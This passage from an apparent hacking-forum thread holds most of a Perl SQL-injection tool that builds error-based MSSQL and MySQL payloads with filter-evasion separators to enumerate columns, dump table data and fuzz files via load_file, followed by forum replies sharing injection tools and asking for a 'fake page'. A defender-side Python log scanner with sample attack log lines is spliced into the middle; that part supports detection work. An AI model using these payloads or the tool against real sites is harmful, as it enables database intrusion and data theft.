     $table = "convert(int,(select".$add."top".$add."1".$add."column_name".$add."from".$add."information_schema.columns".$add."where".$add."table_name"."="."'$tblextrct'".$add."And".$add."column_name".$add."not".$add."in".$add."($data)"."));--";
	 print "[!] Columns : //// \n\n"; 
     for ($i;$i<1500;$i++)
     {
         my $injection = $site.$table ;
         my $useragent = LWP::UserAgent->new();
		 $ua->proxy("http", "http://$proxy/") if defined($proxy);
         my $request   = $useragent->get($injection);
         my $response  = $request->content;
         if ($response =~ /.*?value\s'(.*?)'\sto.*/sm)
         {
	         print "[+] ".$1."\n";
			 push (@extcols,$1);
	         $start = "(";
	         $data .= ",'$1'";
	         $end   = ")";
	         $total = $start.$data.$end;
	         $table = "convert(int,(select".$add."top".$add."1".$add."column_name".$add."from".$add."information_schema.columns".$add."where".$add."table_name"."="."'$tblextrct'".$add."And".$add."column_name".$add."not".$add."in".$add."$total"."));--";	
         }
     }
	 if (defined($vulnfile))
     {
		 open(vuln_file,">>$vulnfile") ;
         print vuln_file "[!] Target            : $site\n";
         print vuln_file "[!] evasion           : $ev\n";
         print vuln_file "[!] Data  :: ----     \n\n\n";
		 $i=0;
		 foreach(@extcols)
		 {
             print vuln_file $extcols[$i]."\n";
			 $i++;
		 }
         close(vuln_file);
         print "\n[+] Result Saved to $vulnfile\n";
	 }
}

sub mssqldump
{
     my $site   = $_[0];
     my $ev     = $_[1];
	 my $tblextrct = $_[2];
	 my $colmextrct = $_[3];
	 print "[+] Table  : $tblextrct\n";
	 print "[+] Column : $colmextrct\n";
     if ($ev eq '/*') 
	 {$add = "/**/" ; $com = "/*";}
     elsif ($ev eq '%20') 
	 {$add = "%20" ; $com = "%00" ;}
     else 
	 {$add = '+' ; $com ='--';}
	 print "\n[+] Table Extracting, Started Please Wait ....\n\n";
	 $data = "'Ws65qd798sqd9878'";
     $table = "convert(int,(select".$add."top".$add."1".$add."$colmextrct".$add."from".$add."$tblextrct".$add."where".$add."$colmextrct".$add."not".$add."in".$add."($data)"."));--";
	 print "[!] Columns : //// \n\n"; 
     for ($i;$i<1500;$i++)
     {
         my $injection = $site.$table ;
         my $useragent = LWP::UserAgent->new();
		 $ua->proxy("http", "http://$proxy/") if defined($proxy);
         my $request   = $useragent->get($injection);
         my $response  = $request->content;
         if ($response =~ /.*?value\s'(.*?)'\sto.*/sm)
         {
	         print "[+] ".$1."\n";
			 push (@dumpdata,$1);
	         $start = "(";
	         $data .= ",'$1'";
	         $end   = ")";
	         $total = $start.$data.$end;
	         $table = "convert(int,(select".$add."top".$add."1".$add."$colmextrct".$add."from".$add."$tblextrct".$add."where".$add."$colmextrct".$add."not".$add."in".$add."$total"."));--";
         }
     }
	 if (defined($vulnfile))
     {
		 open(vuln_file,">>$vulnfile") ;
         print vuln_file "[!] Target            : $site\n";
         print vuln_file "[!] evasion           : $ev\n";
         print vuln_file "[!] Data  :: ----     \n\n\n";
		 $i=0;
		 foreach(@dumpdata)
		 {
             print vuln_file $dumpdata[$i]."\n";
			 $i++;
		 }
         close(vuln_file);
         print "\n[+] Result Saved to $vulnfile\n";
	 }
}

variables();
main();

if (defined($search_dork))
{
     print "[+] Vulnerability Scan\n" ;
     print "[+] Dork : $search_dork\n\n\n" ;
     vulnscanner();
	 if (defined($vulnfile))
     {
         open(vuln_file,">>$vulnfile") ;
         print vuln_file @mysqlvuln;
         print vuln_file @mssqlvuln;
         print vuln_file @accessvuln;
         close(vuln_file);
         print "[+] Result Saved to $vulnfile\n";
         exit();
     }
} 

if (defined($mysql_count_target))
{
     print "[+] MySQL Column Counter\n\n" ;
     print "[+] Target : $mysql_count_target\n" ;
     if ($evasion eq '/*')
	 {
	     print "[+] Evasion : /**/\n" ;
	 }
     elsif ($evasion eq '%20')
	 {
	     print "[+] Evasion : %20\n" ;
	 }
	 else
	 {
	     print "[+] Evasion : --\n" ;
		 $evasion = "--"
	 }
	 mysqlcount($mysql_count_target,$evasion);
}

if (defined($mysql_details_target))
{
     print "[+] MySQL database details\n\n" ;
     print "[+] Target : $mysql_details_target\n" ;
     if ($evasion eq '/*')
	 {
	     print "[+] Evasion : /**/\n" ;
	 }
     elsif ($evasion eq '%20')
	 {
	     print "[+] Evasion : %20\n" ;
	 }
	 else
	 {
	     print "[+] Evasion : --\n" ;
		 $evasion = "--"
	 }
	 mysqldetails($mysql_details_target,$evasion);
}

if (defined($mysql_schema_target))
{
     print "[+] MySQL Schema Extractor details\n\n" ;
     print "[+] Target : $mysql_schema_target\n" ;
     if ($evasion eq '/*')
	 {
	     print "[+] Evasion : /**/\n" ;
	 }
     elsif ($evasion eq '%20')
	 {
	     print "[+] Evasion : %20\n" ;
	 }
	 else
	 {
	     print "[+] Evasion : --\n" ;
		 $evasion = "--"
	 }
	 mysqlschema($mysql_schema_target,$evasion);
}

if (defined($mysql_dump_target))
{
     if (!defined($sql_dump_column))
	 {
	     print "[!] Please Define At Least A Column\n";
		 exit();
	 }
     elsif (!defined($sql_dump_table))
	 {
	     print "[!] Please Define Table Name\n";
		 exit();
	 }
	 else
	 {
	     print "[+] MySQL Data Dumper details\n\n" ;
         print "[+] Target : $mysql_dump_target\n" ;
         if ($evasion eq '/*')
	     {
	         print "[+] Evasion : /**/\n" ;
	     }
         elsif ($evasion eq '%20')
	     {
	         print "[+] Evasion : %20\n" ;
	     }
	     else
	     {
	         print "[+] Evasion : --\n" ;
			 $evasion = "--"
	     }
		 mysqldump($mysql_dump_target,$sql_dump_column,$sql_dump_table,$evasion);
	 }	 
}

if (defined($mysql_fuzz_table))
{
     if(!defined($word_list))
     {
	     print "[!] Please Define A list of tables to load\n";
		 exit();
     }	 
	 else
	 {
	     print "[+] MySQL Tables Fuzzer\n\n" ;
         print "[+] Target : $mysql_fuzz_table\n" ;
	     if ($evasion eq '/*')
         {
             print "[+] Evasion : /**/\n" ;
         }
         elsif ($evasion eq '%20')
         {
             print "[+] Evasion : %20\n" ;
         } 
         else
         {
             print "[+] Evasion : --\n" ;
			 $evasion = "--"
         }
	     mysqlfuzztable($mysql_fuzz_table,$evasion,$word_list);	 
	 }
}

if (defined($mysql_fuzz_column))
{
     if(!defined($word_list))
     {
	     print "[!] Please Define A list of columns to load\n";
		 exit();
     }	 
     elsif(!defined($sql_dump_table))
     {
	     print "[!] Please Define A Table To Fuzz it's Columns\n";
		 exit();
     }	
	 else
	 {
	     print "[+] MySQL Columns Fuzzer\n\n" ;
         print "[+] Target : $mysql_fuzz_column\n" ;
	     if ($evasion eq '/*')
         {
             print "[+] Evasion : /**/\n" ;
         }
         elsif ($evasion eq '%20')
         {
             print "[+] Evasion : %20\n" ;
         } 
         else
         {
             print "[+] Evasion : --\n" ;
			 $evasion = "--"
         }
	     mysqlfuzzcolumn($mysql_fuzz_column,$evasion,$word_list,$sql_dump_table);	 
	 }
}

if (defined($mysql_load_file))
{
     if(!defined($word_list))
     {
	     print "[!] Please Define A list of files to load\n";
		 exit();
     }	 
	 else
	 {
	     print "[+] MySQL Load_File Fuzzer\n\n" ;
         print "[+] Target : $mysql_load_file\n" ;
	     if ($evasion eq '/*')
         {
             print "[+] Evasion : /**/\n" ;
         }
         elsif ($evasion eq '%20')
         {
             print "[+] Evasion : %20\n" ;
         } 
         else
         {
             print "[+] Evasion : --\n" ;
			 $evasion = "--"
         }
	     mysqlfile($mysql_load_file,$evasion,$word_list);	 
	 }
}

if (defined($mssql_details_target))
{
	 print "[+] MsSQL DB Details\n\n" ;
     print "[+] Target : $mssql_details_target\n" ;
	 if ($evasion eq '/*')
     {
         print "[+] Evasion : /**/\n" ;
     }
     elsif ($evasion eq '%20')
     {
         print "[+] Evasion : %20\n" ;
     }
     else
     {
         print "[+] Evasion : --\n" ;
		 $evasion = "--"
     }
	 mssqldetails($mssql_details_target,$evasion);	 
}

if (defined($mssql_table_target))
{
	 print "[+] MsSQL Tables Extractor\n\n" ;
     print "[+] Target : $mssql_table_target\n" ;
	 if ($evasion eq '/*')
     {
         print "[+] Evasion : /**/\n" ;
     }
     elsif ($evasion eq '%20')
     {
         print "[+] Evasion : %20\n" ;
     }
     else
     {
         print "[+] Evasion : --\n" ;
		 $evasion = "--"
     }
	 mssqltable($mssql_table_target,$evasion);	 
}

if (defined($mssql_column_target))
{
     if(!defined($sql_dump_table))
	 {
	     print "[!] Please Define At Least A Table To Extract From\n";
		 exit();
	 }
	 else
	 {
	     print "[+] MsSQL Columns Extractor\n\n" ;
         print "[+] Target : $mssql_column_target\n" ;
	     if ($evasion eq '/*')
         {
             print "[+] Evasion : /**/\n" ;
         }
         elsif ($evasion eq '%20')
         {
             print "[+] Evasion : %20\n" ;
         } 
         else
         {
             print "[+] Evasion : --\n" ;
			 $evasion = "--"
         }
	     mssqlcolumn($mssql_column_target,$evasion,$sql_dump_table);	 
	 }
}

if (defined($mssql_dump_target))
{
     if(!defined($sql_dump_table))
	 {
	     print "[!] Please Define At Least A Table\n";
		 exit();
	 }
     elsif(!defined($sql_dump_column))
	 {
	     print "[!] Please Define At Least A Column\n";
		 exit();
	 }
	 else
	 {
	     print "[+] MsSQL Data Dumper\n\n" ;
         print "[+] Target : $mssql_dump_target\n" ;
	     if ($evasion eq '/*')
         {
             print "[+] Evasion : /**/\n" ;
         }
         elsif ($evasion eq '%20')
         {
             print "[+] Evasion : %20\n" ;
         } 
         else
         {
             print "[+] Evasion : --\n" ;
			 $evasion = "--"
         }
	     mssqldump($mssql_dump_target,$evasion,$sql_dump_table,$sql_dump_column);	 
	 }
}


not working
jospyro
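As an added, defender-side example that is not part of the posted script or this thread: a small Python log scanner that normalises the three separator styles the script switches between (`+`, `/**/`, `%20`) and flags its `convert(int,(select top 1 ... not in (...)))` error-based extraction pattern in web-server access logs. The log lines are constructed for the example; the sentinel `Ws65qd798sqd9878` is the value the script seeds its NOT IN list with on the first request.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (not from the page); the first three mimic
# the request the posted tool builds, one per evasion mode (+, /**/, %20).
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2012:10:00:01 +0000] "GET /news.asp?id=12+and+1=convert(int,(select+top+1+name+from+sysobjects+where+name+not+in+('Ws65qd798sqd9878')));-- HTTP/1.1" 500 512
10.0.0.5 - - [01/Jan/2012:10:00:02 +0000] "GET /news.asp?id=12/**/and/**/1=convert(int,(select/**/top/**/1/**/name/**/from/**/sysobjects/**/where/**/name/**/not/**/in/**/('a','b')));/* HTTP/1.1" 500 512
10.0.0.5 - - [01/Jan/2012:10:00:03 +0000] "GET /news.asp?id=12%20and%201=convert(int,(select%20top%201%20name%20from%20sysobjects%20where%20name%20not%20in%20('a')));%00 HTTP/1.1" 500 512
10.0.0.7 - - [01/Jan/2012:10:00:04 +0000] "GET /news.asp?id=12 HTTP/1.1" 200 4096
10.0.0.8 - - [01/Jan/2012:10:00:05 +0000] "GET /search.asp?q=convert+to+pdf HTTP/1.1" 200 2048
"""

REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/')
# Shape of the tool's extraction query once separators are normalised:
# convert(int,(select top 1 <col> from <tbl> where <col> not in (<seen values>)))
SIGNATURE = re.compile(
    r"convert\(int,\(select\s+top\s+1\s+(\S+)\s+from\s+(\S+)\s+where\s+\S+\s+not\s+in\s*\(([^)]*)\)",
    re.IGNORECASE)
TOOL_MARKER = "Ws65qd798sqd9878"  # sentinel the script seeds its NOT IN list with


def normalise(raw_path):
    """URL-decode and collapse +, %20 and /**/ separators to single spaces."""
    return re.sub(r"\s+", " ", unquote_plus(raw_path).replace("/**/", " "))


def detect(line):
    """Return a finding dict for one access-log line, or None if it is benign."""
    m = REQUEST.match(line)
    sig = m and SIGNATURE.search(normalise(m.group(2)))
    if not sig:
        return None
    column, table, seen = sig.groups()
    raw = m.group(2)
    return {
        "client": m.group(1), "column": column, "table": table,
        "evasion": "/**/" if "/**/" in raw else "%20" if "%20" in raw else "+",
        # each loop pass appends one quoted value, so the list length shows
        # how many rows the attacker has already pulled from that column
        "seen_values": len(re.findall(r"'[^']*'", seen)),
        "tool_marker": TOOL_MARKER in seen,
    }


def scan(log_text):
    """Run detect() over every line and keep the hits."""
    return [f for f in map(detect, log_text.splitlines()) if f]
```

Because the script re-sends the whole NOT IN list on every iteration, the request length and `seen_values` grow monotonically from one client, which is a stronger signal than any single match.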
Old 08-11-2011, 09:23 PM   #27
Tornado2800 (New member, joined Aug 2011, posts: 1)

Quote:
Originally posted by firemaker
Hello

safe3si is a tool that can be used for sql injection; friends can download it from the link below (though I should say its power does not reach havij)

[Only site members can see links]


Thanks
Are you sure its power does not reach Havij?
Did you test it?
Tornado2800
Old 10-09-2011, 04:06 PM   #28
sahil_kinara (New member, joined Mar 2011, posts: 3)

Thanx dear...
sahil_kinara
Old 11-04-2011, 10:18 PM   #29
HackerGharb (New member, joined Nov 2011, posts: 2)

Just a bit old.
Please upload the fake page again
HackerGharb
Old 02-20-2012, 08:45 AM   #30
KingDomEviL (New member, joined Feb 2012, posts: 1)

Thank youuuu
KingDomEviL